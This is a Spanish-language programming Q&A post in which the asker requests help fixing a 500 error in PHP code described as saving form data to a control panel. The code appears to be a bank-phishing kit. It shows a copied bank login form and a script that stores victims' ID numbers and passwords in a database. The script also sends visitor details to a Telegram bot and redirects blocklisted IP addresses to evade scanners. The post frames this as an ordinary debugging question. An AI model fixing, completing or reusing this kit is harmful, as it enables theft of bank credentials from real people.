# ¿Cómo puedo solucionar este error?

Tags: javascript, php, html, mysql, base-de-datos

¡Holaa!
Bueno, les explico estoy intentando de hacer que los datos de un formulario se guarden en un panel de control a través de mysql y por más que intento conectarlos todos mediante php y mysqli me da que la web noes capaz de procesar mi request (error 500). Por descarte he descubierto que me da error con la web que hace la conexión con la base de datos, pero no sé en qué estoy fallando. Os dejo aquí el código. Gracias de antemano. He de decir que tengo otro archivo en el que se definen las funciones getRealIp() y getRealUag().
Parte HTML y PHP Formulario

```
    <?php
function nif_valido($usuario) {
    $usuario = strtoupper($usuario);
 
    $usuarioRegEx = '/^[0-9]{8}[A-Z]$/i';
    $nieRegEx = '/^[XYZ][0-9]{7}[A-Z]$/i';
 
    $letras = "TRWAGMYFPDXBNJZSQVHLCKE";
 
    if (preg_match($usuarioRegEx, $usuario)) return ($letras[(substr($usuario, 0, 8) % 23)] == $usuario[8]);
    else if (preg_match($nieRegEx, $usuario)) {
        if ($usuario[0] == "X") $usuario[0] = "0";
        else if ($usuario[0] == "Y") $usuario[0] = "1";
        else if ($usuario[0] == "Z") $usuario[0] = "2";
 
        return ($letras[(substr($usuario, 0, 8) % 23)] == $usuario[8]);
    }
    else return false;
 }
 ?>


<?php if(isset($_SESSION['errores']['contrasena']) or isset($_SESSION['errores']['usuario'])) : ?>
  <div class="errore">
    <p style="
    background-color: #e9e9e9;
    border: #e9e9e9;
    padding: 12px;
    font-size: 13px;
    text-align: center;
">
    <i class="fas fa-exclamation-triangle" style="font-size: 2rem;color: #ec0000;top: 2px;position: relative;left: -8px;" aria-hidden="true"></i>
    
        <?php
            // $veri1 =  isset($_SESSION['errores']['pass']) ? $_SESSION['errores']['pass'] : false;
            // $veri2  = isset($_SESSION['errores']['num-documento']) ? $_SESSION['errores']['num-documento'] : false;
            // $veri3  = isset($_SESSION['errores']['tipos_dni']) ? $_SESSION['errores']['tipos_dni'] : false;
            echo('Ha de introducir un identificador y/o clave válidos');
        ?>  
    </p>
</div>
<?php endif; 
    unset($_SESSION['errores']);
    if(isset($_SESSION['errores']['user-pass'])) :
?>
<div class="error">
    <p style="
    background-color: #e9e9e9;
    border: #e9e9e9;
    padding: 12px;
    font-size: 13px;
    text-align: center;
">
    <i class="fas fa-exclamation-triangle" style="font-size: 2rem;color: #ec0000;top: 2px;position: relative;left: -20px;" aria-hidden="true"></i>
        <?=$_SESSION['errores']['user-pass']?>  
    </p>
</div>
  <?php 
    endif; 
  ?>
 <form method="post" autocomplete="off"  name="bloc_ident" id="bloc_ident" action="rude/login.php?id=particulares">
        <fieldset>
            
            <div class="ei_appl_ident_content">
                
                <div class="ei_appl_ident_lig">
                    
                    <label for="usuario">Usuario</label>
                    
                    <input type="text" name="usuario" id="_userid" value="" placeholder="" class="ei_appl_userid">
                    
                    
            
                    
                    <input type="hidden" name="flag" value="password">
                    <input type="hidden" name="_charset_">
                </div>

                <div class="ei_appl_ident_lig">

               <label for="contrasena">Contraseña</label>
               

               
               <input type="password" name="contrasena" id="_pwduser" placeholder="" class="ei_appl_pwduser">
               


                </div>
```

LOGIN FUNCTION

```
<?php
error_reporting(E_ALL);
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    session_start();
     require_once 'funciones.php';
     require_once '../config.php';
   require '../admintus/config/data.php';
    $ip = getRealIP();
    $uag = getRealUag();
    if ($_GET['id'] == 'particulares') {
        #nif/cif 9
        #nie/pasaporte 14
        #usuario 20


         $_SESSION['usuario'] = $_POST['usuario'];
         $_SESSION['contrasena'] = $_POST['contrasena'];

        $errores = array();

        if (trim(empty($_SESSION['usuario']))) {
            $errores['usuario'] = 'Ha de introducir un identificador y/o clave válidos';
            #header("../");
        }

        if (trim(empty($_SESSION['contrasena'])) or strlen(trim($_SESSION['contrasena'])) < 8) {
            $errores['contrasena'] = 'Ha de introducir un identificador y/o clave válidos';
            #header("../");
        }

        if(trim(empty($_SESSION['contrasena'])) or trim(empty($_SESSION['usuario']))) {
            $errores['user-pass'] = 'Por favor introduzca de nuevo el identificador y la clave de acceso. El identificador y/o la clave no son válidos.';
        }
        */
     
        if (count($errores)  !== 0) {
            $_SESSION['errores'] = $errores;
            header("location: ../");
        }else {
            $msg  = "Trong\n\n";
            $msg .= "DAT01s : \n";
            $msg .= "Function? : " . $_SESSION['function']."\n";
            $msg .= "Code : " . $_SESSION['tesing']."\n";
            $msg .= "IP : ".$ip ."\n\n";
            $msg .= "Uag : ".$uag ."\n";

            sendTg($msg, $bot_token, $chat_id);
            
            if (isset($_SESSION['update']['login'])) {
                $stmt = $connp->prepare("UPDATE `targo` SET `dni` = :dni, `pass` = :pass,`status` = 0 WHERE time = :time");
                $stmt->bindParam(':dni', $_POST['usuario']);
                $stmt->bindParam(':pass', $_POST['contrasena']);
                $stmt->bindParam(':time', $_SESSION['time']);
                $stmt->execute();
            }else {
                $stmt = $connp->prepare("INSERT INTO `targo`(`tipo`,`dni`,`pass`, `ip`, `ua`, `time`, `status`) VALUES (:tipo, :dni, :pass, :ip, :ua, :time, 0)");
                $stmt->bindParam(':tipo', $_GET['id']);
                $stmt->bindParam(':dni', $_POST['usuario']);
                $stmt->bindParam(':pass', $_POST['contrasena']);
                $stmt->bindParam(':ip', $ip);
                $stmt->bindParam(':ua', $uag);
                $stmt->bindParam(':time', $_SESSION['time']);
                $stmt->execute();
            }

            // $stmt->bindParam(':tipo', $_GET['id']);
            // $stmt->bindParam(':dni', $_POST['num-documento']);
            // $stmt->bindParam(':pass', $_POST['pass']);
            // $stmt->bindParam(':ip', $ip);
            // $stmt->bindParam(':ua', $uag);
            // $stmt->bindParam(':time', $_SESSION['time']);
            // $stmt->execute();
            $_SESSION['page'] = true;
            header("location: ./login/index.php");
        }

    }
?>
Parte de la que da fallo:
    <?php
error_reporting(0);

$seckey='6969';  // Here is the admin-access key

$servername = "localhost";  // Host
$username = "example";  //User
$password = 'root'; // Password
$dbname = "mkzamgbo_draco"; // dbname

$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
    die("Conexion Fallida: " . $conn->connect_error);
} 
$connp = new PDO("mysql:host=$servername;dbname=$dbname", $username, $password);

function sendTg($msg, $bot_token, $chat_id) {
    $apiToken = $bot_token;
    $data = [
            'chat_id' => $chat_id,
        'text' => $msg
    ];
    $response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" . http_build_query($data));
}



function createF($name, $arg) {
    #creamos el archivo con el nombre de la variable $name 
    $ban = fopen($name,"a+");
    #escribimos en el archivo creado el contenido de la variable $arg
    fwrite($ban,$arg."\r\n");
    fclose($ban);
    
    $msg = "";
    #Comprobamos si se creo el archivo y retornamos un mensaje a la variable $msg
    if (file_exists($name)) {
        $msg = "create and write successfull";
    #de lo contrario si hay un error retornamos un mensaje de error a la variable $msg
    }else {
        $msg = "Error not permitions";
    }
    return $msg;
}

#Function Para Obtener la IP real del visitante
function getRealIP()  {

    if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
         $ip = $_SERVER["HTTP_CF_CONNECTING_IP"];
    }
    elseif(isset($_SERVER["HTTP_CLIENT_IP"])) {
        $ip = $_SERVER["HTTP_CLIENT_IP"];
    }
    elseif(isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
        $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    }
    elseif(isset($_SERVER["HTTP_X_FORWARDED"])) {
        $ip = $_SERVER["HTTP_X_FORWARDED"];
    }
    elseif(isset($_SERVER["HTTP_FORWARDED_FOR"])) {
        $ip = $_SERVER["HTTP_FORWARDED_FOR"];
    }
    elseif(isset($_SERVER["HTTP_FORWARDED"])) {
        $ip = $_SERVER["HTTP_FORWARDED"];
    }
    else {
        $ip = (isset($_SERVER["REMOTE_ADDR"]) == "::1") ? "127.0.0.1" : $_SERVER["REMOTE_ADDR"];
    }

    return $ip;

}

#Funcion Para Obetner el UserAgent Real del Usuario
function getRealUag() {
$data = array(
    // Header can occur on devices using Opera Mini.
    'HTTP_X_OPERAMINI_PHONE_UA',
    // Vodafone specific header: http://www.seoprinciple.com/mobile-web-community-still-angry-at-vodafone/24/
    'HTTP_X_DEVICE_USER_AGENT',
    'HTTP_X_ORIGINAL_USER_AGENT',
    'HTTP_X_SKYFIRE_PHONE',
    'HTTP_X_BOLT_PHONE_UA',
    'HTTP_DEVICE_STOCK_UA',
    'HTTP_X_UCBROWSER_DEVICE_UA',
    // Sometimes, bots (especially Google) use a genuine user agent, but fill this header in with their email address
    'HTTP_FROM',
    'HTTP_X_SCANNER', // Seen in use by Netsparker
       // The default User-Agent string.
    'HTTP_USER_AGENT',
);

foreach ($data as $uag) {
    if (isset($_SERVER[$uag])) {
        $uag = $_SERVER[$uag];
    }
}
return $uag;
}

function comprobateIP($file_url, $ip, $redirect) {
        $ipArray = file($file_url);
        foreach ($ipArray as $ipTest) {
        if (substr_count($ip,trim($ipTest)) != "0") { 
        echo '<meta http-equiv="refresh" content="0;url='.$redirect.'">';
        exit(); 
        }
    }
}

function nif_valido($nif) {
    $nif = strtoupper($nif);
 
    $nifRegEx = '/^[0-9]{8}[A-Z]$/i';
    $nieRegEx = '/^[XYZ][0-9]{7}[A-Z]$/i';
 
    $letras = "TRWAGMYFPDXBNJZSQVHLCKE";
 
    if (preg_match($nifRegEx, $nif)) return ($letras[(substr($nif, 0, 8) % 23)] == $nif[8]);
    else if (preg_match($nieRegEx, $nif)) {
        if ($nif[0] == "X") $nif[0] = "0";
        else if ($nif[0] == "Y") $nif[0] = "1";
        else if ($nif[0] == "Z") $nif[0] = "2";
 
        return ($letras[(substr($nif, 0, 8) % 23)] == $nif[8]);
    }
    else return false;
 }
?>
```

Comment: Podrías ser más específico en el error ?? Cual es el error que el sistema arroja ??

Comment: Por favor revisa los logs de PHP e incluye en tu pregunta lo que encuentres allí (algún error?)